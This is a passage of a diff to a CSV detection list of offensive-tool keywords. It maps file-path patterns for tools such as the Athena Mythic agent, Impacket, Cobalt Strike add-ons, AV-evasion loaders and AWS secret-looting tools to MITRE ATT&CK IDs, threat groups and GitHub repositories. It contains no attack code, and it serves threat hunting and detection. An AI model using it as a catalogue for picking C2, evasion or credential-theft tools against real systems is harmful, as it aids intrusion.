TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*/AtomLdr.git*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*/attackercan/*","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
-"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/attacks/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/AttackServers/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/AttackSurfaceMapper.git*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/Augustus.git*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/auth/cc2_auth.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*/autobloody.git*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*/autobloody/archive*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*/AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a 
post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*/AutoSmuggle.git*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*/autotimeliner*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" -"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/auxiliary/scanner/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/avet.git*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*/avet_fabric.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/avet_script_config.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*/avoid_badchars.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are 
identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.git*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that 
can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/awesome-burp-extensions/*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/awesome-pentest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/aws__enum_account/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/AWS-Loot*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/Azure-AccessPermissions.git*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*/AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 